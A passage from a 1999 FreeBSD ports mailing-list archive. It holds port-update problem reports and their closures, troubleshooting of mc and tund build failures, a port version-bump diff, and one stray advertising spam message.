patch-ai > --- patches/patch-ai 1999/12/23 18:37:52 1.2 > +++ patches/patch-ai 1999/12/25 00:20:11 > @@ -9,12 +9,3 @@ > XZIP="$DZIP/zip -g" > XDZIP="$DZIP/zip -d" > XUNZIP="$DZIP/unzip" > -@@ -67,7 +67,7 @@ > - if ($8 ~ /\/$/) > - printf "drwxr-xr-x 1 %-8d %-8d %8d %s %s %s\n", uid, 0, $1, $5, $6, $8 > - else > -- printf "-rw-r--r-- 1 %-8d %-8d %8d %s %s %s\n", uid, 0, $1, $5, $6, substr($0, index($0, $7) + length($7 " ") > -+ printf "-rw-r--r-- 1 %-8d %-8d %8d %s %s %s\n", uid, 0, $1, $5, $6, substr($0, index($0, $7) + length($7 " ")) > - }' 2>/dev/null > - fi > - } > > -Chris > -- > cpiazza@jaxon.net cpiazza@FreeBSD.org > Abbotsford, BC, Canada > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18: 0:56 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9A51D1583F; Fri, 24 Dec 1999 18:00:42 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA11826; Fri, 24 Dec 1999 18:00:42 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 18:00:42 -0800 (PST) From: Message-Id: <199912250200.SAA11826@freefall.freebsd.org> To: lioux@linf.unb.br, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15444: Updated port: graphics/xpdf due to pending upgrade of devel/t1lib Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Updated port: graphics/xpdf due to pending upgrade of devel/t1lib State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 18:00:28 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18: 2:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 445EB157EC; Fri, 24 Dec 1999 18:02:04 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA12014; Fri, 24 Dec 1999 18:02:03 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 18:02:03 -0800 (PST) From: Message-Id: <199912250202.SAA12014@freefall.freebsd.org> To: igor@zynaps.ru, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15437: update graphics/gd port to support ttf and xpm Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update graphics/gd port to support ttf and xpm State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 18:01:12 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18: 2:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id 4D23514CEB; Fri, 24 Dec 1999 18:02:36 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: from localhost (vince@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) with ESMTP id QAA34462; Fri, 24 Dec 1999 16:02:42 -1000 (HST) (envelope-from vince@pele.WURLDLINK.NET) Date: Fri, 24 Dec 1999 16:02:42 -1000 (HST) From: Vincent Poy To: steve@FreeBSD.org Cc: freebsd-ports@FreeBSD.org Subject: Re: ports/15642: tund port build failure In-Reply-To: <199912240417.UAA61951@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 23 Dec 1999 steve@FreeBSD.org wrote: > Synopsis: tund port build failure > > State-Changed-From-To: open->closed > State-Changed-By: steve > State-Changed-When: Thu Dec 23 20:16:30 PST 1999 > State-Changed-Why: > Remove the openssl port and try again. The only way I was able to make > this happen was to compile openssl as a USA_RESIDENT and then tund as a > non-USA_RESIDENT. Pretty interesting. Perhaps, there should be a note informing the user to remove the openbssl port and then set USA_RESIDENT as no when compiling the tund port. Cheers, Vince - vince@WURLDLINK.NET - Vice President ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] WurldLink Corporation / / / / | / | __] ] San Francisco - Honolulu - Hong Kong / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] Almighty1@IRC - oahu.DAL.NET Hawaii's DALnet IRC Network Server Admin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18: 4:58 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6BDD815890; Fri, 24 Dec 1999 18:04:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA12276; Fri, 24 Dec 1999 18:04:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 18:04:50 -0800 (PST) From: Message-Id: <199912250204.SAA12276@freefall.freebsd.org> To: james@ja.ath.cx, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15415: port games/xqf: update to 0.9.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: port games/xqf: update to 0.9.1 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 18:02:42 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18:11: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1D87214E4B for ; Fri, 24 Dec 1999 18:10:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA12538; Fri, 24 Dec 1999 18:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 24 Dec 1999 18:10:03 -0800 (PST) Message-Id: <199912250210.SAA12538@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Chris Piazza Subject: Re: ports/15676: mc port build fails after commit by nakai Reply-To: Chris Piazza Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15676; it has been noted by GNATS. From: Chris Piazza To: Vincent Poy Cc: Chris Piazza , FreeBSD-gnats-submit@FreeBSD.ORG, nakai@FreeBSD.ORG Subject: Re: ports/15676: mc port build fails after commit by nakai Date: Fri, 24 Dec 1999 18:01:40 -0800 On Fri, Dec 24, 1999 at 03:55:29PM -1000, Vincent Poy wrote: > On Fri, 24 Dec 1999, Chris Piazza wrote: > > I tried the patch but the problem is still there... > > root@earth [5:53pm][/usr/ports/misc/mc] >> make clean ; make install > ===> Cleaning for gettext-0.10.35 > ===> Cleaning for libtool-1.3.3 > ===> Cleaning for glib-1.2.6 > ===> Cleaning for libtool-1.3.3 > ===> Cleaning for gmake-3.78.1 > ===> Cleaning for mc-4.5.42 > ===> Extracting for mc-4.5.42 > >> Checksum OK for mc-4.5.42.tar.gz. > ===> mc-4.5.42 depends on executable: gmake - found > ===> mc-4.5.42 depends on shared library: glib12.3 - found > ===> mc-4.5.42 depends on shared library: intl.1 - found > ===> Patching for mc-4.5.42 > ===> Applying FreeBSD patches for mc-4.5.42 > 1 out of 2 hunks failed--saving rejects to vfs/extfs/uzip.in.rej Are you sure it applied? There should only be one chunk after my patch. wc -l patch-ai should give you 11 lines if you want to check. -Chris -- cpiazza@jaxon.net cpiazza@FreeBSD.org Abbotsford, BC, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18:15:48 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.HiWAAY.net (fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (Postfix) with ESMTP id A7A0014E1C for ; Fri, 24 Dec 1999 18:15:45 -0800 (PST) (envelope-from sprice@hiwaay.net) Received: from localhost (sprice@localhost) by mail.HiWAAY.net (8.9.3/8.9.0) with ESMTP id UAA13416; Fri, 24 Dec 1999 20:15:42 -0600 (CST) Date: Fri, 24 Dec 1999 20:15:40 -0600 (CST) From: Steve Price To: Vincent Poy Cc: freebsd-ports@FreeBSD.org Subject: Re: ports/15642: tund port build failure In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 24 Dec 1999, Vincent Poy wrote: # Pretty interesting. Perhaps, there should be a note informing the # user to remove the openbssl port and then set USA_RESIDENT as no when # compiling the tund port. The key is to compile them both with the same value of USA_RESIDENT. This should be pretty self-explanatory. :) However it is easy to get messed up since we now ship crypto stuff on the CDs. So say you install the openssl port from CD (USA_RESIDENT=yes) or some port that requires it and later you build tund from the port. Kaboom you get the problem that you were seeing. Don't know for sure what happened in your case but the explanation I provided in the PR was my "best guess". -steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18:18:46 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 34DBF14C23; Fri, 24 Dec 1999 18:18:45 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA12938; Fri, 24 Dec 1999 18:18:45 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 18:18:45 -0800 (PST) From: Message-Id: <199912250218.SAA12938@freefall.freebsd.org> To: ob@seicom.net, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15330: editor joe modification Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: editor joe modification State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 18:18:15 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18:20: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3748614CCD for ; Fri, 24 Dec 1999 18:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA13043; Fri, 24 Dec 1999 18:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 24 Dec 1999 18:20:03 -0800 (PST) Message-Id: <199912250220.SAA13043@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Vincent Poy Subject: Re: ports/15676: mc port build fails after commit by nakai Reply-To: Vincent Poy Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15676; it has been noted by GNATS. From: Vincent Poy To: Chris Piazza Cc: FreeBSD-gnats-submit@FreeBSD.ORG, nakai@FreeBSD.ORG Subject: Re: ports/15676: mc port build fails after commit by nakai Date: Fri, 24 Dec 1999 16:13:23 -1000 (HST) On Fri, 24 Dec 1999, Chris Piazza wrote: > On Fri, Dec 24, 1999 at 03:55:29PM -1000, Vincent Poy wrote: > > On Fri, 24 Dec 1999, Chris Piazza wrote: > > > > I tried the patch but the problem is still there... > > > > root@earth [5:53pm][/usr/ports/misc/mc] >> make clean ; make install > > ===> Cleaning for gettext-0.10.35 > > ===> Cleaning for libtool-1.3.3 > > ===> Cleaning for glib-1.2.6 > > ===> Cleaning for libtool-1.3.3 > > ===> Cleaning for gmake-3.78.1 > > ===> Cleaning for mc-4.5.42 > > ===> Extracting for mc-4.5.42 > > >> Checksum OK for mc-4.5.42.tar.gz. > > ===> mc-4.5.42 depends on executable: gmake - found > > ===> mc-4.5.42 depends on shared library: glib12.3 - found > > ===> mc-4.5.42 depends on shared library: intl.1 - found > > ===> Patching for mc-4.5.42 > > ===> Applying FreeBSD patches for mc-4.5.42 > > 1 out of 2 hunks failed--saving rejects to vfs/extfs/uzip.in.rej > > Are you sure it applied? There should only be one chunk after my patch. > wc -l patch-ai should give you 11 lines if you want to check. Let me try this once again on another machine... root@victor [6:06pm][/usr/ports/misc/mc] >> patch < 1 Hmm... Looks like a unified diff to me... The text leading up to this was: -------------------------- |Index: patches/patch-ai |=================================================================== |RCS file: /home/ncvs/ports/misc/mc/patches/patch-ai,v |retrieving revision 1.2 |diff -u -r1.2 patch-ai |--- patches/patch-ai 1999/12/23 18:37:52 1.2 |+++ patches/patch-ai 1999/12/25 00:20:11 -------------------------- Patching file patches/patch-ai using Plan A... Hunk #1 succeeded at 9. done Looks like it works fine... The problem was the two lines substr($0, index($0, $7) + length($7 " ") in the patch appeared to be a line of it's own but should have not CR. Guess that's the drawback of cut and paste. Perhaps the patch should be commited. Cheers, Vince - vince@WURLDLINK.NET - Vice President ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] WurldLink Corporation / / / / | / | __] ] San Francisco - Honolulu - Hong Kong / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] Almighty1@IRC - oahu.DAL.NET Hawaii's DALnet IRC Network Server Admin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18:22:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7F31C14FFB; Fri, 24 Dec 1999 18:22:16 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA13269; Fri, 24 Dec 1999 18:22:16 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Fri, 24 Dec 1999 18:22:16 -0800 (PST) From: Message-Id: <199912250222.SAA13269@freefall.freebsd.org> To: vince@pele.WURLDLINK.NET, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15676: mc port build fails after commit by nakai Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: mc port build fails after commit by nakai State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Fri Dec 24 18:21:58 PST 1999 State-Changed-Why: Fixed, thanks for testing the patch. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18:27: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6F74C15651; Fri, 24 Dec 1999 18:27:02 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA13664; Fri, 24 Dec 1999 18:27:02 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 18:27:02 -0800 (PST) From: Message-Id: <199912250227.SAA13664@freefall.freebsd.org> To: rip@pinetec.co.za, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15315: Xfstt may thrash the drive. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Xfstt may thrash the drive. State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 18:25:33 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18:28:45 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id C1EF314D00 for ; Fri, 24 Dec 1999 18:28:43 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: from localhost (vince@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) with ESMTP id QAA46828; Fri, 24 Dec 1999 16:28:47 -1000 (HST) (envelope-from vince@pele.WURLDLINK.NET) Date: Fri, 24 Dec 1999 16:28:47 -1000 (HST) From: Vincent Poy To: Steve Price Cc: freebsd-ports@FreeBSD.org Subject: Re: ports/15642: tund port build failure In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 24 Dec 1999, Steve Price wrote: > On Fri, 24 Dec 1999, Vincent Poy wrote: > > # Pretty interesting. Perhaps, there should be a note informing the > # user to remove the openbssl port and then set USA_RESIDENT as no when > # compiling the tund port. > > The key is to compile them both with the same value of USA_RESIDENT. > This should be pretty self-explanatory. :) However it is easy to get > messed up since we now ship crypto stuff on the CDs. So say you install > the openssl port from CD (USA_RESIDENT=yes) or some port that requires > it and later you build tund from the port. Kaboom you get the problem > that you were seeing. > > Don't know for sure what happened in your case but the explanation I > provided in the PR was my "best guess". Not sure what happened but I know in early November, I can compile tund fine with the openssl already installed. But the situation seems to be that I compiled openssl with the USA_RESIDENT=yes and installed it and then tried to compile tund with USA_RESIDENT=yes. The only workaround was to uninstall openssl and then build and install tund using USA_RESIDENT=no and then build and install openssl again afterwards. Cheers, Vince - vince@WURLDLINK.NET - Vice President ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] WurldLink Corporation / / / / | / | __] ] San Francisco - Honolulu - Hong Kong / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] Almighty1@IRC - oahu.DAL.NET Hawaii's DALnet IRC Network Server Admin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18:40: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 218A61511A for ; Fri, 24 Dec 1999 18:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA14928; Fri, 24 Dec 1999 18:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id 084CA14E5C for ; Fri, 24 Dec 1999 18:37:18 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: (from root@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) id QAA47098; Fri, 24 Dec 1999 16:37:24 -1000 (HST) (envelope-from vince) Message-Id: <199912250237.QAA47098@pele.WURLDLINK.NET> Date: Fri, 24 Dec 1999 16:37:24 -1000 (HST) From: Vincent Poy Reply-To: vince@pele.WURLDLINK.NET To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15677: unable to fetch vscan port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15677 >Category: ports >Synopsis: unable to fetch vscan port >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 18:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vincent Poy >Release: FreeBSD 4.0-CURRENT i386 >Organization: Wurldlink Corporation - San Francisco - Honolulu - Hong Kong >Environment: 4.0-CURRENT and 3.3-RELEASE >Description: unable to fetch vscan port, seems like master site file and path no longer exists >How-To-Repeat: root@victor [6:34pm][/usr/ports/security/vscan] >> make >Fix: Unknown >Release-Note: >Audit-Trail: >Unformatted: >> nlxb318e.tar doesn't seem to exist on this system. >> Attempting to fetch from ftp://ftp.mcafee.com/pub/antivirus/unix/linux/. fetch: ftp.mcafee.com: unix: File unavailable (e.g., file not found, no access) >> Attempting to fetch from ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/. fetch: pub/FreeBSD/ports/distfiles/nlxb318e.tar: cannot get remote modification time fetch: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/nlxb318e.tar: FTP error: fetch: File unavailable (e.g., file not found, no access) >> Couldn't fetch it - please try to retrieve this >> port manually into /usr/ports/distfiles/ and try again. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18:44:31 1999 Delivered-To: freebsd-ports@freebsd.org Received: from lvcm.com (pop3.lvcablemodem.com [24.234.0.136]) by hub.freebsd.org (Postfix) with ESMTP id C685114A23 for ; Fri, 24 Dec 1999 18:44:29 -0800 (PST) (envelope-from freestuff@lvcablemodem.com) Received: from pop3.lvcablemodem.com ([24.234.0.11]) by lvcm.com with Microsoft SMTPSVC(5.5.1877.977.9); Fri, 24 Dec 1999 18:44:36 -0800 Received: from (dhcp074.43.lvcm.com [24.234.43.74]) by pop3.lvcablemodem.com with SMTP (MailShield v1.5); Fri, 24 Dec 1999 18:52:14 -0800 From: "CheapInfo" To: "ports@freebsd.org" Date: Fri, 24 Dec 1999 18:43:10 -0800 Subject: Y2Free long distance Reply-To: cheapinfo@mytalk.com Organization: CheapInfo.com MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 Message-ID: <0758f36440219c9MAILSVR2@lvcm.com> Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I thought you might be interested in this information in time for the holidays… Make long distance calls for FREE! Get your own 800/888/877 number and call anywhere in the US. Listen and respond to email over the phone. Click here to get your own account now: http://click.linksynergy.com/fs-bin/stat?id=oaoPm6*td38&offerid=9645.6&type=3&subid=0 (If you have trouble with the above link, go to http://www.cheapinfo.com and click on the link for "Free Phone Calls" on the main page). No tricks or gimmicks. The only "catch" is that you are limited to 2 minutes per call and have to listen to a few brief messages. You can call as many people as you like, as many times as you want, anytime, anywhere in the US, for FREE! Get free Internet access, email, fax, web hosting, and much, much more! Get paid to surf the Internet! Check out these and other free items with no strings attached at: http://www.cheapinfo.com Check back often, as the site is constantly being updated. All free products and services are supported by advertisers. If you find something that you think should be added to the site, please reply to the email with the link you want added. Note: Send ONLY 100% free links. No MLM, chain letter, or any other links that are not 100% absolutely free products or services. Shareware is not free, as it is expected you will pay at some point. No "business opportunities" or "stuff envelopes at home". The site is being developed as a central place to find the best free stuff on the internet. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18:59: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 80EB514FB1; Fri, 24 Dec 1999 18:59:02 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA15908; Fri, 24 Dec 1999 18:59:02 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 18:59:02 -0800 (PST) From: Message-Id: <199912250259.SAA15908@freefall.freebsd.org> To: howardjp@wam.umd.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15260: New port: games/cursive Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: games/cursive State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 18:58:47 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 20:50: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7F8DA15200 for ; Fri, 24 Dec 1999 20:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA19992; Fri, 24 Dec 1999 20:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from fly.lglobus.ru (fly.lglobus.ru [195.34.224.130]) by hub.freebsd.org (Postfix) with ESMTP id 4281014C47 for ; Fri, 24 Dec 1999 20:42:02 -0800 (PST) (envelope-from rover@fly.lglobus.ru) Received: (from rover@localhost) by fly.lglobus.ru (8.9.3/8.9.3) id HAA52369; Sat, 25 Dec 1999 07:44:35 +0300 (MSK) (envelope-from rover) Message-Id: <199912250444.HAA52369@fly.lglobus.ru> Date: Sat, 25 Dec 1999 07:44:35 +0300 (MSK) From: "Oleg V. Volkov" Reply-To: "Oleg V. Volkov" To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15679: port update: games/adom to version 0.99.g15 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15679 >Category: ports >Synopsis: port update: games/adom to version 0.99.g15 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 20:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Oleg V. Volkov >Release: FreeBSD 3.2-STABLE i386 >Organization: -=/ SR 13 /=- >Environment: Fresh ports. >Description: See synopsis. >How-To-Repeat: See fix. >Fix: diff -ruN ../old/Makefile ./Makefile --- ../old/Makefile Wed Aug 25 10:02:47 1999 +++ ./Makefile Sat Dec 25 06:53:39 1999 @@ -1,13 +1,13 @@ # New ports collection makefile for: adom -# Version required: 0.99g14 +# Version required: 0.99g15 # Date created: 22 July 1999 # Whom: Oleg V. Volkov # # $FreeBSD: ports/games/adom/Makefile,v 1.2 1999/08/25 06:02:47 obrien Exp $ # -DISTNAME= adom-099g14-elf -PKGNAME= adom-0.99.g14 +DISTNAME= adom-099g15-elf +PKGNAME= adom-0.99.g15 CATEGORIES= games MASTER_SITES= http://www.adom.de/adom/ diff -ruN ../old/files/md5 ./files/md5 --- ../old/files/md5 Sun Aug 1 07:30:45 1999 +++ ./files/md5 Sat Dec 25 07:09:57 1999 @@ -1 +1 @@ -MD5 (adom-099g14-elf.tar.gz) = c4421fa9bba043d45afbfa5c6133fe23 +MD5 (adom-099g15-elf.tar.gz) = 837f89c400a840186c3a1b6f316559cd >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 20:57:56 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 196BA14DEA; Fri, 24 Dec 1999 20:57:55 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA20310; Fri, 24 Dec 1999 20:57:54 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 20:57:54 -0800 (PST) From: Message-Id: <199912250457.UAA20310@freefall.freebsd.org> To: spcoltri@unm.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15431: New port: games/baduki Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: games/baduki State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 18:59:37 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 21: 5: 0 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8E41115219; Fri, 24 Dec 1999 21:04:59 -0800 (PST) (envelope-from steve@FreeBSD.org) 